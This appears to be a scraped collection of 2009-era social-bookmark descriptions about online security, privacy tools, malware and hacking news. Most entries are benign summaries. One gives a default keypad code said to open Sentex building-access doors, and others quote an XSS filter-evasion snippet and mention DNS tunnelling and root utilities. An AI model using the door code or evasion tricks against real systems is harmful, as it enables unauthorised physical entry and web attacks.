10+ Ways To Protect Images From Being Stolen
http://www.webresourcesdepot.com/10-ways-to-protect-images-from-being-stolen/
CopyGator.com - Is your content being duplicated, copied or plagiarized?
http://www.copygator.com/

Mitkriegen, wenn andere das selbe (ab)schreiben. Nicht, dass das angesichts von CC wirklich wichtig wäre.

OperaTor is a portable software bundle which allows you to browse the web anonymously. It combines the power of the Opera Browser, Tor and Polipo.

Opera + Tor. Surf anonymously | Arche Twist

OS/2

The administration area of a Web application is a favorite target of hackers and thus particularly well protected. The same goes for WordPress: when creating a blog, the system creates an administrative user with a perfectly secure password and blocks public...

The administration area of a Web application is a favorite target of hackers and thus particularly well protected. The same goes for WordPress: when creating a blog, the system creates an administrative user with a perfectly secure password and blocks public access to the settings area with a log-in page. This is the cornerstone of its protection. Let’s dig deeper!

The administration area of a Web application is a favorite target of hackers and thus particularly well protected. The same goes for WordPress: when creating a blog, the system creates an administrative user with a perfectly secure password and blocks public access to the settings area with a log-in page. This article focuses on defending the administration area of WordPress, meaning all those pages in the wp-admin folder (or http://www.yourblog.com/wp-admin/) that are displayed after a user a verified.

By Sergej Müller and Alex Frison The administration area of a Web application is a favorite target of hackers and thus particularly well protected. The same goes for WordPress: when creating a blog, the system

The administration area of a Web application is a favorite target of hackers and thus particularly well protected. The same goes for WordPress: when creating a blog, the system creates an administrative user with a perfectly secure password and blocks public access to the settings area with a log-in page. This is the cornerstone of its protection. Let’s dig deeper! This article focuses on defending the administration area of WordPress, meaning all those pages in the wp-admin folder (or http://www.yourblog.com/wp-admin/) that are displayed after a user a verified. We highlighted the phrase “after a user is verified” deliberately: it should be explicitly understood that only a simple query stands in the way of an evil hacker and the powerful admin area of your whole blog. The latter is only as strong as the passwords that are generated.

If you're not concerned about privacy in the age of the Internet yet, you should. Don't want to take my word for it? Then read this.

What information is available about you in cyberspace? Where does it come from, and what risks does it present? Computerworld's Robert L. Mitchell set out to see just how much he could find about himself online. What he discovered is frightening.

The web is fast becoming the collective knowledge base of all of humanity, for better or for worse.

public / private data with logging on

Overview of the security principles identity, authentication and authorization.

Security

Ver clear description of the problem. Identity - "who are you?" - public assertion - locally unique. Authentication - "how can you prove it?" - secret response - non-unique. So biometrics are identity, not authentication.

A free application for the Mac which saves your documents on regular intervals based on your preferences.

Save files before your Mac applications quit on you

Never miss again hours of hard work to an unexpected crash. EverSave brings automated, timed saving function to any application on your Mac.

Auto-save tool for all Mac applications!

Automatically saves your work at a specified interval. Works with the applications you use on a daily basis. Set the options in the menubar.

Journalists making themselves the story. That could stand to change. Not that i wish that stuff on anyone.

Yesterday as I was leaving the DLD Conference in Munich, Germany someone walked up to me and quite deliberately spat in my face. Before I even understood what was happening, he veered off into the crowd, just another dark head in a dark suit. People around me stared, then looked away and continued their conversation.

Comments are closed on this pos

founded by Google. Quote: is an open, distributed server platform for researchers to deploy Internet measurement tools.

What is whspr!? Need to receive a message by email, but can't (or don't want to) give out your email address? whspr! gives you a URL to share instead.

Need to receive a message by email, but can't (or don't want to) give out your email address? whspr! gives you a URL to share instead.

Get Emails Without Revealing Your Email Address Need to receive a message by email, but can't (or don't want to) give out your email address? whspr! gives you a URL to share instead. So what? Here's an example: Say you want to advertise a job opening on Twitter, and you don't want to share your company email address. Some applicants may not want to post a public @reply, and they can't send you a direct message if you don't already follow them. Include a whspr! URL, and they can reach you discreetly.

login tutorial

php做简单登陆系统

สอนทำระบบล็อกอิน

User Accounts

97586s

Hotspot Shield

Oh no! Your mom just joined Facebook and what's even worse, she wants to be your friend. More and more people are finding themselves in this situation today and unsure of what to do. Friending mom and dad, the boss, or other work colleagues opens up the details of your private life for the whole world to see - and you might not be entirely comfortable with that. What's to be done?

Guide til friendlists

If you did a Google search between 6:30 a.m. PST and 7:25 a.m. PST this morning, you likely saw that the message "This site may harm your computer" accompanied each and every search result. This was clearly an error, and we are very sorry for the inconvenience caused to our users.

Well that explains that...

"If you did a Google search between 6:30 a.m. PST and 7:25 a.m. PST this morning, you likely saw that the message "This site may harm your computer" accompanied each and every search result. This was clearly an error, and we are very sorry for the inconvenience caused to our users. What happened? Very simply, human error" bit worrying really

oooooooo

php

どういう svhost.exe が動いているのか調査してくれるツール

via rodcorp

On the problems of torture and benefits of simple detective investigation: "We got to know our enemies, we learned to negotiate with them, and we adapted criminal investigative techniques to our work [...] 'I decided that everything I was told about Americans was wrong. That's why I decided to cooperate.' [...] I learned in Iraq that the No. 1 reason foreign fighters flocked there to fight were the abuses carried out at Abu Ghraib and Guantanamo"

I learned in Iraq that the No. 1 reason foreign fighters flocked there to fight were the abuses carried out at Abu Ghraib and Guantanamo. Our policy of torture was directly and swiftly recruiting fighters for al-Qaeda in Iraq. The large majority of suicide bombings in Iraq are still carried out by these foreigners. They are also involved in most of the attacks on U.S. and coalition forces in Iraq. It's no exaggeration to say that at least half of our losses and casualties in that country have come at the hands of foreigners who joined the fray because of our program of detainee abuse. The number of U.S. soldiers who have died because of our torture policy will never be definitively known, but it is fair to say that it is close to the number of lives lost on Sept. 11, 2001. How anyone can say that torture keeps Americans safe is beyond me -- unless you don't count American soldiers as Americans.

"I learned in Iraq that the No. 1 reason foreign fighters flocked there to fight were the abuses carried out at Abu Ghraib and Guantanamo. Our policy of torture was directly and swiftly recruiting fighters for al-Qaeda in Iraq.The large majority of suicide bombings in Iraq are still carried out by these foreigners. "

How could anyone deny the opinions of someone one the ground ... especially someone on the ground who was successful.

Until we renounce the sorts of abuses that have stained our national honor, al-Qaeda will be winning.

Interrogator reveals practical reasons why torture was not just wrong in principle, but counterproductive in practice.

You want to know what you can do with Linux outside of the surfing, emailing, chatting and media consumption you normally do? Well, here are a few things to keep you busy.

Cool Things to Do With Linux

So you’ve taken the plunge and installed Linux. You’ve followed all the HOWTOs all over the net. You’ve got your wireless card working flawlessly. You’ve got your video card working (and you’ve begun to loathe that spinning cube). You’ve installed all the “restricted” software like Adobe Flash, Sun Java and Google Earth. You’ve got all the patent restricted codecs and even DVD playback working just like you want. Now what? You want to know what you can do with Linux outside of the surfing, emailing, chatting and media consumption you normally do? Well, here are a few things to keep you busy.

If you're not ready to expose everything about you to anyone who asks to be your online friend, it's time you learned how to use Facebook's friend lists.

How to keep stuff you want open open and stuff you want secret secret. Includes discussion of Facebook's own advice about it.

This is interesting because social networking is not just about staying in touch. We now selectively chose who to communicate with as well as who can communicate with us and how much they can know about us.

Xkcd o dlouhem rsa klici a jinem francouzskem...

For class

erase files forever, nuke HD hard drive

Ever tried to leave Facebook and found out they only allow you to "deactivate" your account? All your personal data, including photos, interests, friends etc will still be saved indefinitely! You don’t have to be a conspiracist to find this quite fishy (or simply annoying)! Look further down for instructions on how to get your account permanently deleted.

Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet.

Cool stuff

Ajax Fancy Captcha is a jQuery plugin that helps you protect your web pages from boys and spammers. We are introducing you to a new, intuitive way of completing “verify humanity” tasks. In order to do that you are asked to drag and drop specified item into a circle.

SIMPLY STUNNING jQuery CAPTCHA! NICE! I want to use this now!

Shuurl is a free service that offers safe shortl urls

comme bit.ly et d'autres

50 seriously useful Windows 7 tips It's the mother lode of Windows 7 tweaks and tricks! : TechRadar UK

The following tools are unique compared to many of our software Hive Fives in that they are entirely independent of the main operating system installed on the computer. Live CDs load into the memory and allow you to use operating systems and accompanying tools without having to perform a permanent installation on the machine

OneSwarm is a new P2P data sharing application we’re building to provide users with explicit control over their privacy by enabling fine-grained control over how data is shared

privacy preserving P2P file sharing software

P2P Privacy

Security

An ordinary deleting of files isn't enough! When you wish to delete any sensitive information, like industrial secrets or some unwanted content, you want to be sure that it will be deleted permanently. Sorry to say, there is a plenty of software recovery tools that can restore your deleted items. If you need to destroy any data and eliminate any possibility of its restoration you need a "shredder". This software destroys the data you choose before the deletion, using a complicated procedure of filling the actual content with random data.

Free document shredder (download)

Hard disk erasing utility (so deleted file cannot be recovered). Similar software: "Eraser", see http://www.heidi.ie/node/6

until they stop producing idiots some people

9 free antivirus programs for Windows

10 Free CAPTCHA scripts and services for websites

Nice technique

Quick little .htaccess trick today for ya’ll. This snippet will redirect any visitor who is not at at one of the provided IP addresses. You can use as many or as few as you would like. This is just a very quick way to block access to a site for, say, everyone but you. Or, everyone but you and a few select co-workers or clients.

Use this technique to whitelist IPs to view a site and block everyone else.

Getting OpenID Into the Browser - O'Reilly Radar - http://radar.oreilly.com/2008/12/getting-openid-into-the-browse.html

The US National Security Agency has helped put together a list of the world's most dangerous coding mistakes.

funny article

25 common coding mistakes, eg CWE-426: Untrusted Search Pat

Some ways of making this more avoidable

I like the increasing delay idea

PHPBB user's password pattern

Hilarious analysis of how people choose their (extremely naive) passwords

Dark Reading | Security | Protect The Business - Enable Access

A popular Website, phpbb.com, was recently hacked. The hacker published approximately 20,000 user passwords from the site. This is like candy to us security professionals because it's hard data we can use to figure out how users choose passwords. I wrote a program to analyze these passwords looking for patterns, and came up with some interesting results.

Analysis of PHBB passwords - interesting observations on some password choices

<tm> http://www.darkreading.com/blog/archives/2009/02/phpbb_password.html

We've covered oodles of privacy apps and topics over the years at Lifehacker, but here are some of our personal favorites:

Encriptación, navegación anónima, gestión de passwords, borrado seguro de ficheros, encriptación de comunicaciones...

Today is Data Privacy Day, during which we're encouraged to reflect on the state of our data and bolster security where we can—so let's take a closer look at our favorite data privacy tips.

Data Privacy Day, during which we're encouraged to reflect on the state of our data and bolster security where we can—so let's take a closer look at our favorite data privacy tips

** Posted using Viigo: Mobile RSS, Sports, Current Events and more **

SSL Certificates Are Ready In 15 Minutes

$19.99 a year for SSL certs

sanitize html strip remove tags

Ruby HTML sanitizer

nifty ruby sanitization library

gem layered on Hpricot

Dropboxの利用法

“PCで仕事”を速くする：第21回 - ITmedia Biz.ID

バイナリ差分とってたとは知らなかった。ファイルレベルだと思ってたよ。

An interactive inquiry about why America hasn't been attacked again. By Timothy NoahUpdated Friday, Feb. 27, 2009, at 8:59 AM ET

This is the first in a series of eight essays exploring why the United States suffered no follow-up terror attacks after 9/11.

The DNS Dead Drop Storing Arbitrary Messages in Remote DNS Caches A few months ago, I read Dan Kaminsky's presentation slides, Attacking Distributed Systems: The DNS Case Study. In the presentation, Kaminsky documents a method of implementing single bit data transfer with nothing more than: * A recursive, caching name server * A wildcard zone After a particularly stressful week, I decided I needed to work on something fun -- an implementation of a DNS-based dead drop messaging system, utilizing Kaminsky's ideas.

DNS Dropzone Storing Arbitrary Messages in Remote DNS Caches A few months ago, I read Dan Kaminsky's presentation slides, Attacking Distributed Systems: The DNS Case Study. In the presentation, Kaminsky documents a method of implementing single bit data transfer with nothing more than:

DNS Dead Drop

The DNS Dead Drop

Features by PC Magazine

Oh sweet. Now I can finally get rid of my stupid myspace.

Deleting accounts you've created on Facebook, MySpace, AOL, and elsewhere on the Web isn't always easy. Here are the details on leaving 23 services behind.

The 13 Most Essential Plugins for WordPress

*Plus applicable sales tax International Orders Give a Gift Privacy Policy

Really interesting article

The blog of a guy learning to survive in an uncertain world future. Interesting reading.

wow this is an interesting idea, albeit morbid.

A service that sends out messages after you're gone.

Sounds creepy, but it worth thinking about

Death Switch allows you to send out email messages, in the case of your demise. It repeatedly contacts you, and if you don't answer within a specified time window, it triggers the 'last message' to whoever you specify.

In February 2003, Notarbartolo was arrested for heading a ring of Italian thieves. They were accused of breaking into a vault two floors beneath the Antwerp Diamond Center and making off with at least $100 million worth of loose diamonds, gold, jewelry, and other spoils. The vault was thought to be impenetrable. It was protected by 10 layers of security, including infrared heat detectors, Doppler radar, a magnetic field, a seismic sensor, and a lock with 100 million possible combinations. The robbery was called the heist of the century, and even now the police can't explain exactly how it was done. The loot was never found, but based on circumstantial evidence, Notarbartolo was sentenced to 10 years. He has always denied having anything to do with the crime and has refused to discuss his case with journalists, preferring to remain silent for the past six years. Until now.

In February 2003, Notarbartolo was arrested for heading a ring of Italian thieves. They were accused of breaking into a vault two floors beneath the Antwerp Diamond Center and making off with at least $100 million worth of loose diamonds, gold, jewelry, and other spoils. The vault was thought to be impenetrable... and even now the police can't explain exactly how it was done.

Compelling yarn, optioned for screen adaptation for obvious reasons.

Using tunneling over DNS or ICMP

TabRenamizer and Page Title Eraser - Do your tabs give you away? Why not change their names with TabRenamizer or remove the names all together with Page Title Eraser? Both these addons let you play with the tab titles so that you can change them according to your will.

ACL

ipredator

vpn service von den pirate bay jungs

virtual private network by ThePirateBay... currently unjoinable :P

from the pirate bay makers

Grâce à la liaison VPN, les données qui transiteront ne pourront pas être identifiées par les FAI ou d'éventuelles officines privées de surveillance des réseaux, si bien qu'il sera en théorie impossible de dire pour quel type d'usage (téléchargement, communication VoIP, jeux en ligne, etc.), un internaute utilisera ce service.

our e-mail for a BETA INVITE

The Spanner - XSS Rays

List of most commonly used passwords

A detailed password analysis of compromised passwords from myspace, phpbb, and singles.org

Singles.orgのパスワード、やけに宗教的な語句が多いなと思ったら、キリスト教徒用出会いサイトなのね

Convert your email address into a short, cute and safe link you can share on the web, in Twitter, forums, Craigslist, anywhere

A quick easy way to share your email address online without fear of spambots.

Protect your email address. Share your email in a safe way. Get less spam. Convert your email address into a short, cute and safe link you can share on the web, in Twitter, forums, Craigslist, anywhere (why?) Email: http://scr.im/ ← pick your URL Optional, either leave blank for a random one, or chose your own memorable scr.im URL!

tech.yahoo.com: Conficker tips

An article about Conficker virus.

Containing Conficker Tools and Infos

The following page contains the tools and analysis results described in our "Know your Enemy" paper "Containing Conficker - To Tame a Malware". The paper is published by the undefinedHoneynet Project and can be downloaded here: undefinedhttps://www.honeynet.org/papers/conficker

simple tool from the malware working group, but someone will have to rotate images.

This works because the virus tries to keep your computer from accessing various AV websites.

Easily test your computer for a Conficker infection

Hmm, is this real?

Conficker Eye Chart

i think this is the origional

Interesting opinion piece on the hazards of link shortening services - inserts an unreliable middleman in the standard web transaction.

All good points in here.

"We need to prepare for the day when N of the URL shorteners go out of business. When that happens a large part of the web will die. It will not be a good day." - Scripting News http://www.scripting.com/stories/2009/04/03/joshIsRightUrlShortenersAr.html

Why URL shorterners are bad for the Internet.

How to open many keypad-access doors 03/11/2009 27 Comment(s) Here's a fun little tip: You can open most Sentex key pad-access doors by typing in the following code: ***00000099#* The first *** are to enter into the admin mode, 000000 (six zeroes) is the factory-default password, 99# opens the door, and * exits the admin mode (make sure you press this or the access box will be left in admin mode!) I'm not sure how prevalent they are, but here in San Francisco, Sentex building access systems seem to be the most popular.

Default-password fail.

Cyberspies have penetrated the U.S. electrical grid and left behind software that could be used to disrupt the system.

eek

Unresolvable

Parece coisa de filme !

Awesome Icon search engines

"To address this threat, we propose a new privacy-preserving layer for P2P systems that obfuscates user-generated network behavior. We show that a user can achieve plausible deniability by simply adding a small percent (between 25 and 50%) of additional random connections that are statistically indistinguishable from natural ones. Based on this result, we designed SwarmScreen, a system that generates such connections by participating in randomly selected torrents without appearing suspicious. Our SwarmScreen plugin, which seamlessly installs into the Vuze/Azureus BitTorrent client, can be downloaded from >>>here<<<."

Different registry tweaks to do random things. Encryption etc.

De-anonymizing Social Networks

webcam

We had hoped this would go differently.

April 7th, 2009 Friday evening, in a motion to dismiss Jewel v. NSA, EFF's litigation against the National Security Agency for the warrantless wiretapping of countless Americans, the Obama Administration's made two deeply troubling arguments.

【危険】実名を公開すると、あなたの住所や電話番号なども丸見えになります

The hackers knocked Rain down the list for moot! ...But it's still a sick hack.:B

In "the Time.com 100 Poll where millions have voted on who are the world’s most influential people in government, science, technology and the arts ... we find a Message embedded in the results ... Looking at the first letters of each of the top 21 leading names in the poll we find the message “marblecake, also the game”. The poll announces (perhaps subtly) to the world, that the most influential are not the Obamas, Britneys or the Rick Warrens of the world, the most influential are an extremely advanced intelligence: the hackers. ... At the core of the hack is the work of a dozen or so, backed by an army of a thousand who downloaded and ran the autovoters and also backed by an untold number of others that unwittingly fell prey to the spam url autovoters. So why do they do it? Why do they write code, build complex applications, publish graphs - why do they organize a team that is more effective than most startup companies? Says Zombocom: “For the lulz”."

Anon hacks Time's 100 Poll so hard

There’s a scene toward the end of the book Contact by Carl Sagan, where the protagonist Ellie Arroway finds a Message embedded deep in the digits of PI. The Message is perhaps an artifact of an extremely advanced intelligence that apparently manipulated one of the fundamental constants of the universe as a testament to their power as they wove space and time. I’m reminded of this scene by the Time.com 100 Poll where millions have voted on who are the world’s most influential people in government, science, technology and the arts. Just as Ellie found a Message embedded in PI, we find a Message embedded in the results of this poll. Looking at the first letters of each of the top 21 leading names in the poll we find the message “marblecake, also the game”. The poll announces (perhaps subtly) to the world, that the most influential are not the Obamas, Britneys or the Rick Warrens of the world, the most influential are an extremely advanced intelligence: the hackers. kg9kl At 4AM this mor

I'm not sure if the argument is right; many people die from heart disease, but I don't think we can say that better diet and exercise would have prevented 100% of these deaths.

A look at utilizing Open Source projects to build an SSL Accelerator for Web Servers that rivals even the most expensive commercial solutions. Advanced SSL Acceleration, Layer 7 URL Processing and Web Acceleration through gzip off-loading.

movement in the banking security industry

Hackers are getting our bank security pin codes!

Hackers have crossed into new frontiers by devising sophisticated ways to steal large amounts of personal identification numbers, or PINs, protecting credit and debit cards, says an investigator. The attacks involve both unencrypted PINs and encrypted PINs that attackers have found a way to crack, according to an investigator behind a new report looking at the data breaches.

Some of the attacks involve grabbing unencrypted PINs, while they sit in memory on bank systems during the authorization process. But the most sophisticated attacks involve encrypted PINs. Sartin says the latter attacks involve a device called a hardware security module (HSM), a security appliance that sits on bank networks and on switches through which PIN numbers pass on their way from an ATM or retail cash register to the card issuer. The module is a tamper-resistant device that provides a secure environment for certain functions, such as encryption and decryption, to occur. According to the payment-card industry, or PCI, standards for credit card transaction security, PIN numbers are supposed to be encrypted in transit, which should theoretically protect them if someone intercepts the data. The problem, however, is that a PIN must pass through multiple HSMs across multiple bank networks en route to the customer's bank. These HSMs are configured and managed d

Yves & TWA (comments) say this article has some fact checking issues

According to the payment-card industry, or PCI, standards for credit card transaction security, PIN numbers are supposed to be encrypted in transit, which should theoretically protect them if someone intercepts the data. The problem, however, is that a PIN must pass through multiple HSMs across multiple bank networks en route to the customer's bank. These HSMs are configured and managed differently, some by contractors not directly related to the bank. At every switching point, the PIN must be decrypted, then re-encrypted with the proper key for the next leg in its journey, which is itself encrypted under a master key that is generally stored in the module or in the module's application programming interface, or API.

Leonardo Notarbartolo strolls into the prison visiting room trailing a guard as if the guy were his personal assistant. The other convicts in this eastern Belgian prison turn to look. Notarbartolo nods and smiles faintly, the laugh lines crinkling around his blue eyes. Though he's an inmate and wears the requisite white prisoner jacket, Notarbartolo radiates a sunny Italian charm. A silver Rolex peeks out from under his cuff, and a vertical strip of white soul patch drops down from his lower lip like an exclamation mark.

Pretty amazing account of a diamond heist in Antwerp. I imagine that various Hollywood types are scrabbling for the rights to produce "Notarbartolo's Five" even as I type this...

Leuk verhaal over grote 3Oceans 11" achtige kluisbraak in Antwerp Diamond Centre

pattern of authentication that allows users to connect their Twitter account with third-party services in as little is one click. It utilizes OAuth and although the flow is very similar, the authorization URL and workflow differs slightly as described below.

Use your twitter account as an openID account to sign-in

Nifty utility to become root on a box.

Being online is like being in public. Nearly anything that gets posted can come back to haunt you. Here is a guide to protecting your online identity.

good content - horrible design makes me not want to read it

by Bruce Perens

Introduction I love to use JavaScript in unexpected ways, to create code that looks like it shouldn't work but does, or produces some unexpected behavior. This may sound trivial, but the results I've found lead to some very useful techniques. Each of the techniques described can be used for XSS filter evasion, which was my original intention when developing them. However, learning such JavaScript can dramatically increase your knowledge of the language, helping you become better at cleaning up input, and increase web application security. So read on and enjoy my weird and wonderful JavaScript hacks. RegExp replace can execute code When using regular expressions with replace the second argument supports a function assignment. In Opera it seems you can use this argument to execute code. For example, check out the code snippet below: 'XSS'.replace(/XSS/g,alert) This results in alert('XSS'); this works because the match from the RegExp is passed to the alert function as an argument. N

I love to use JavaScript in unexpected ways, to create code that looks like it shouldn't work but does, or produces some unexpected behavior. This may sound trivial, but the results I've found lead to some very useful techniques. Each of the techniques described can be used for XSS filter evasion, which was my original intention when developing them. However, learning such JavaScript can dramatically increase your knowledge of the language, helping you become better at cleaning up input, and increase web application security.

Lifehacker - Five Best Malware Removal Tools - Malware Removal

Five Best Malware Removal Tools - Malware Removal

The internet—unfortunately—isn't a never-ending buffet of secure open-source software and Bollywood-style musicals starring LOLCats. There are people and organizations that delight in stealing your personal data, hijacking your computer, and making a general nuisance of themselves through malicious software. This week we're highlighting the top five tools for removing software with ill-intentions from you PC.

A team of pranksters found a way to control the Time top 100 influential people list... I guess this demonstrates that they are in-fact "influential"...

programming hacking

Oooh. You need this handy guide from mashable!

Project described in the Age, volunteer border watchers for USA-Mexico border

The TBSC BlueServoSM Virtual Community WatchSM is a network of cameras and sensors along the Texas-Mexico border that feeds live streaming video to www.BlueServo.net. Users will log in to the BlueServoSM website and directly monitor suspicious criminal activity along the border via this virtual fenceSM.

The Texas Border Sheriff's Coalition (TBSC) has joined BlueServoSM in a public-private partnership to deploy the Virtual Community Watch, an innovative real-time surveillance program designed to empower the public to proactively participate in fighting border crime. The TBSC BlueServoSM Virtual Community WatchSM is a network of cameras and sensors along the Texas-Mexico border that feeds live streaming video to www.BlueServo.net. Users will log in to the BlueServoSM website and directly monitor suspicious criminal activity along the border via this virtual fenceSM.

XSS (Cross Site Scripting)

Panda Cloud Antivirus FREE - The first free cloud antivirus against viruses, spyware, rootkits and adware

How to stop the drug wars

http://www.economist.com/opinion/displayStory.cfm?story_id=13237193 Howtostopthedrugwars Economist 2

.htaccessのちょっとしたティップス

.htaccess

画像などのファイルへの直リンクを禁止する方法

from ibm developerworks

"Prey es una pequeña y muy, muy simple aplicación que recolecta un lote información de tu computador, y la envía a una casilla de correo que hayas definido previamente. La idea es que la instales en tu laptop para que cuando llegue el día — ojalá nunca — en que desaparezca el tarro, cuentes con más información para rastrearlo, ya sea usando el IP, el nombre de la red WiFi a la que esté conectado, o bien la foto del impostor."

Prey, un programa que te ayuda a rastrear un compu cuando te lo roban

Si me preguntan ahora, hubiera preferido que mi ex-ex-notebook muriera a causa de una gran, gran explosión. Mil veces éso a que desapareciera un dí…

Motion Detection is a free application that turns your webcam into a motion-sensing security camera in just a few clicks.

Windows only: Motion Detection is a free application that turns your webcam into a motion-sensing security camera in just a few clicks.

, ユビキタス社会の歩き方(6) Bluetoothの「デバイスの公開」「検出可能にする」..

やべぇやべぇ

Bluetooth機器探査の応答をログに記録するプログラムを作成して、山手線を4周してきた。

Whilst technically possible for sometime now, the use and ethics of DPI needs careful consideration.

Canada has been investigating several complaints involving ISP use of deep packet inspection technology.

For membership-oriented websites, registration forms are one of the most important parts. A problematic experience, even if the sign-up is completed, will place a "question mark" to the visitor or vice-versa. Password LockAnd, it is also the first step where you can show that you care about the security of the website & all the data collected. Although you can control/improve the security of the website, it is sometimes the weak passwords used that may have unwanted consequences. Guiding users to have a strong password with the help of password strength meters, besides being an easy process, will help improving the security of the whole & show that the website pays attention to it...

"Cardinal Richelieu famously said: 'If one would give me six lines written by the hand of the most honest man, I would find something in them to have him hanged.' When all your words and actions can be saved for later examination, different rules have to apply."

Schneier says privacy is quickly disappearing and we're ignoring it. It's like pollution at the beginning of the century: we're ignoring it now because it's small but soon we'll realize it was a big problem that should have been nipped in the bud. Also, if every conversation is recorded we have to change our standards accordingly; eg: how information is considered in a court.

"Society works precisely because conversation is ephemeral; because people forget, and because people don't have to justify every word they utter. ... Privacy isn't just about having something to hide; it's a basic right that has enormous value to democracy, liberty, and our humanity. ... Just as we look back at the beginning of the previous century and shake our heads at how people could ignore the pollution they caused, future generations will look back at us – living in the early decades of the information age – and judge our solutions to the proliferation of data. We must, all of us together, start discussing this major societal change and what it means. And we must work out a way to create a future that our grandchildren will be proud of."

Beautiful essay by Bruce Schneier on the challenges of our time due to data collection, the "pollution" of the information age. Tweeted by Thomas Kriese.

"Cardinal Richelieu famously said: "If one would give me six lines written by the hand of the most honest man, I would find something in them to have him hanged." When all your words and actions can be saved for later examination, different rules have to apply." This is especially important for those who say that they have nothing to hide. That misses the point.

Welcome to the future, where everything about you is saved. A future where your actions are recorded, your movements are tracked, and your conversations are no longer ephemeral. A future brought to you not by some 1984-like dystopia, but by the natural tendencies of computers to produce data. Data is the pollution of the information age. It's a natural byproduct of every computer-mediated interaction. It stays around forever, unless it's disposed of. It is valuable when reused, but it must be done carefully. Otherwise, its after effects are toxic. And just as 100 years ago people ignored pollution in our rush to build the Industrial Age, today we're ignoring data in our rush to build the Information Age. Increasingly, you leave a trail of digital footprints throughout your day.

Let’s say you own a big building full of valuable stuff. How do you make sure that the night watchman patrolling your factory floor or museum galleries after closing time actually makes his rounds? How do you know he’s inspecting every hallway, floor, and stairwell in the facility? How do you know he (or she) is not just spending every night sleeping at his desk? An elegant solution, designed and patented in 1901 by the German engineer A.A. Newman, is called the “watchclock”. It’s an ingenious mechanical device, slung over the shoulder like a canteen and powered by a simple wind-up spring mechanism. It precisely tracks and records a night watchman’s position in both space and time for the duration of every evening. It also generates a detailed, permanent, and verifiable record of each night’s patrol.

"But the watchclock is another kind of interaction design, one whose function corrals the user into a single, linear, constrained sort of behavior. The night watchman has a fundamental social constraint — the desire to not get fired from their job. This constraint allows the watchclock patrol system to work so effectively (some would say insidiously) as an interaction design instrument of control."

"How do you make sure that the night watchman patrolling your factory floor or museum galleries...actually makes his rounds? How do you know he’s inspecting every hallway, floor & stairwell? How do you know he is not just spending every night sleeping at his desk? If you’re a technology designer, you might suggest using surveillance cameras or even GPS to track his location each night, right? But let’s make this interesting...go...back...[to]1900. What could you possibly do in 1900 to be absolutely sure a night watchman was making his full patrol? An elegant solution, designed and patented in 1901 by the German engineer A.A. Newman, is called the “watchclock”. It’s an ingenious mechanical device, slung over the shoulder like a canteen and powered by a simple wind-up spring mechanism. It precisely tracks and records a night watchman’s position in both space and time for the duration of every evening. It also generates a detailed, permanent & verifiable record of each night’s patrol."

Let’s say you own a big building full of valuable stuff. How do you make sure that the night watchman patrolling your factory floor or museum galleries after closing time actually makes his rounds? How do you know he’s inspecting every hallway, floor, and stairwell in the facility? How do you know he (or she) is not just spending every night sleeping at his desk?

opt out of internet ads

tracking cookie を無効化させる

14 day trial then $10 to purchase. No Win7 or 64 bit support as of 5-13-09

lock tool

Mobile phone bluetooth enabled security which locks itself as you walk away with your Blackberry or iPhone and unlocks as you return.

Phoenix Freeze enables you to automatically lock and unlock your laptop with just your cell phone. Save battery life and protect your files just by walking away.

Supposedly has better proximity control features, but it replaces the winlogon GINA, supposedly has BIOS compatibility issues, continuously broadcasts so it exposes you, and can not work with a bluetooth mouse or keyboard...

Poner en HIbernacion tu ordenador cuando alejas una fuente Bluetooth, por ejemplo el movil

Often the best ideas are the simplest. A laptop which locks itself as you walk away with your Blackberry® or iPhone™ and unlocks as you return

よく考えるなこんな方法……。

Last week at eurocrypt, a small group of researchers announced a fairly serious attack against the SHA-1 digest algorithm, which is used in many cryptosystems, including OpenPGP. The general consensus is that we should be "moving in an orderly fashion toward the theater exits," deprecating SHA-1 where possible with an eye toward abandoning it soon (one point of reference: US gov't federal agencies have been directed to cease all reliance on SHA-1 by the end of 2010, and this directive was issued before the latest results).

Stuff I ought to do

Tips for a Debian GNU/Linux System Administrator.

how it works

"&quot;There is no time for celebration when we fix a cable,&quot; Rennie says. &quot;There is lots of pressure from cable owners to move quickly. They are losing revenue.&quot;" そんなに頻繁に切れてるのかぁ… (いや、確かにそうだけど)

"For the past five years, John Rennie has braved the towering waves of the North Atlantic Ocean to keep your e-mail coming to you. As chief submersible engineer aboard the Wave Sentinel, part of the fleet operated by U.K.-based undersea installation and maintenance firm Global Marine Systems, Rennie--a congenial, 6'4", 57-year-old Scotsman--patrols the seas, dispatching a remotely operated submarine deep below the surface to repair undersea cables."

The Beast

Como ufuncionan los cables submarinos por internet

Pull up the wrong undersea cable, and the Internet goes dark in Berlin or Dubai. See our animated infographics of how the web works!

to be read

- IT業界を - ZDNet Japan

great technical read

Excellent article on the security implications not only of NaCl, but of Java and ActiveX and native X86 code.

What would it look like if Google tried to unseat Flash and obsolete all desktop applications?

Tips, Tricks, and Techniques on using Cascading Style Sheets (CSS)

php

good to animate

When you want a really strong security on the web, it's a good idea to use SSL. SSL can be used to encrypt your end to end connection to the web server, but you will need a client certificate for the possibility to verify you as who you are. The right way to get a certificate like this is for your browser to generate it! The private key should NEVER get out of the client machine. It should be generated and stored within the browser certificate store.

<form> <keygen name="pubkey" challenge="randomchars"> <input type="submit" name="createcert" value="Generate"> </form>

html <keygen>

When you want a really strong security on the web, it's a good idea to use SSL. SSL can be used to encrypt your end to end connection to the web server, but you will need a client certificate for the possibility to verify you as who you are. The right way to get a certificate like this is for your browser to generate it! The private key should NEVER get out of the client machine. It should be generated and stored within the browser certificate store.

photos stay on facebook for weeks

Portable para borrar datos

This report documents the GhostNet - a suspected cyber espionage network of over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs. The capabilities of GhostNet are far-reaching. The report reveals that Tibetan computer systems were compromised giving attackers access to potentially sensitive information, including documents from the private office of the Dalai Lama. The report presents evidence showing that numerous computer systems were compromised in ways that circumstantially point to China as the culprit. But the report is careful not to draw conclusions about the exact motivation or the identity of the attacker(s), or how to accurately characterize this network of infections as a whole. The report argues that attribution can be obscured. The report concludes that who is in control of GhostNet is less important than the opportunity for generating st

